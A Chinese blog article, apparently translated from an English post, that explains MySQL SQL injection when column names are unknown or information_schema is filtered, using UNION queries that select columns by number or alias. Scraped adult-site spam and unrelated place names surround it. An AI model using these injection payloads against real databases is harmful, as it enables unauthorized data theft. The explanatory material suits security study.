最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

MySQL在不知道列名情況下的注入詳解

 更新時間:2019年03月23日 10:07:43   作者:Se7en  
這篇文章主要給大家介紹了關于MySQL在不知道列名情況下的注入的相關資料,文中通過示例代碼介紹的非常詳細,對大家學習或者使用mysql具有一定的參考學習價值,需要的朋友們下面來一起學習學習吧

前言

最近感覺腦子空空,全在為了刷洞去挖洞,還是回歸技術的本身讓自己舒服些。好了,下面話不多說了,來一起看看詳細的介紹吧

前提

以下情況適用于 MySQL < 5版本,或者在 MySQL >= 5 的版本[存在information_schema庫],且已獲取到庫名和表名

① 當只能獲取到表名,獲取不到列名或者只能獲取到無有效內(nèi)容的列名情況【例如 id】

② 當希望通過information_schema庫中的表去獲取其他表的結(jié)構(gòu),即表名、列名等,但是這個庫被WAF過濾掉的情況

其實個人感覺這個方法還是對 5 版本以下的實用性比較強一些,因為對我來說,一般遇到waf就放棄了(菜的真實23333)

解決

正常的查詢:

以下是正常查詢 test 庫中的 user 表內(nèi)容

select * from user;

UNION查詢:

select 1,2,3,4 union select * from user;

數(shù)字對應列查詢:

可以使用數(shù)字來對應列來進行查詢,如 2 對應了表里面的 name 列

select `2` from (select 1,2,3,4 union select * from user)a;

別名代替查詢:

當反引號 ` 不能使用的時候,可以使用別名來代替,如設置 2 的別名為 b

select b from (select 1,2 as b,3,4 union select * from user)a;

多列合并查詢:

同上:這里反引號不能用的話,一樣可以使用別名代替

select concat(`2`,0x3a,`3`) from (select 1,2,3,4 union select * from user)a limit 1,1;

僅作翻譯以及思路整理

原文鏈接:https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/

總結(jié)

以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學習或者工作具有一定的參考學習價值,謝謝大家對腳本之家的支持。

相關文章

  • MySQL8.0.28數(shù)據(jù)庫安裝和主從配置說明

    MySQL8.0.28數(shù)據(jù)庫安裝和主從配置說明

    這篇文章主要介紹了MySQL8.0.28數(shù)據(jù)庫安裝和主從配置說明,具有很好的參考價值,希望杜大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教
    2022-12-12
  • 深入了解MySQL中INSTR()函數(shù)的使用

    深入了解MySQL中INSTR()函數(shù)的使用

    本文主要介紹了深入了解MySQL中INSTR()函數(shù)的使用,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2023-07-07
  • mysql增量語句如何修改表的字段

    mysql增量語句如何修改表的字段

    本文介紹了如何在MySQL中實現(xiàn)數(shù)據(jù)庫的增量更新,確保多次執(zhí)行增量語句不會影響最終結(jié)果,通過使用存儲過程,解決了MySQL無法直接執(zhí)行塊語句的問題,文章詳細描述了增量添加、修改和刪除某個字段的操作,并總結(jié)了增量語句的編寫方法,類似于編寫冪等接口
    2024-12-12
  • Mysql8.0壓縮包安裝方法(詳細教程一步步安裝)

    Mysql8.0壓縮包安裝方法(詳細教程一步步安裝)

    這篇文章主要給大家介紹了關于Mysql8.0壓縮包安裝方法,文中介紹的非常詳細,Mysql安裝的時候可以有msi安裝和zip解壓縮兩種安裝方式,文中通過圖文介紹的非常詳細,需要的朋友可以參考下
    2023-07-07
  • 詳解MySQL雙活同步復制四種解決方案

    詳解MySQL雙活同步復制四種解決方案

    這篇文章主要介紹了MySQL 雙活同步復制四種方案,主從復制分成三步,本文給大家介紹的非常詳細,具有一定的參考借鑒價值,需要的朋友可以參考下
    2018-08-08
  • 進入mysql命令行和退出mysql命令行詳解

    進入mysql命令行和退出mysql命令行詳解

    這篇文章主要介紹了進入mysql命令行和退出mysql命令行,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教
    2022-11-11
  • 寶塔面板mysql無法啟動問題的分析和解決

    寶塔面板mysql無法啟動問題的分析和解決

    在使用寶塔linux面板一鍵安裝LNMP的是,數(shù)據(jù)庫mysql始終無法啟動,查查找找用了幾個小時,問題終于解決了,下面這篇文章主要給大家介紹了關于寶塔面板mysql無法啟動問題的分析和解決方法,需要的朋友可以參考下
    2023-04-04
  • Linux下mysql 5.7 部署及遠程訪問配置

    Linux下mysql 5.7 部署及遠程訪問配置

    這篇文章主要為大家詳細介紹了Linux下mysql 5.7 部署及遠程訪問的配置方法,具有一定的參考價值,感興趣的小伙伴們可以參考一下
    2018-09-09
  • mysql如何判斷同一字段是否有重復數(shù)據(jù)

    mysql如何判斷同一字段是否有重復數(shù)據(jù)

    這篇文章主要介紹了mysql如何判斷同一字段是否有重復數(shù)據(jù)問題,具有很好的參考價值,希望對大家有所幫助,如有錯誤或未考慮完全的地方,望不吝賜教
    2024-05-05
  • MySQL錯誤代碼大全

    MySQL錯誤代碼大全

    本章列出了當你用任何主機語言調(diào)用MySQL時可能出現(xiàn)的錯誤。首先列出了服務器錯誤消息。其次列出了客戶端程序消息
    2014-01-01

最新評論

札达县| 日照市| 若尔盖县| 连城县| 麻城市| 梁平县| 田林县| 大英县| 华安县| 阳泉市| 梅州市| 宿州市| 南陵县| 新河县| 阿瓦提县| 应城市| 时尚| 雷波县| 吉林省| 石泉县| 西华县| 孟州市| 梧州市| 扎兰屯市| 宣威市| 禄劝| 苍溪县| 洛隆县| 余江县| 宜都市| 阳江市| 桂平市| 盐源县| 建始县| 茶陵县| 邵阳县| 桓台县| 莒南县| 蚌埠市| 阜平县| 天峻县|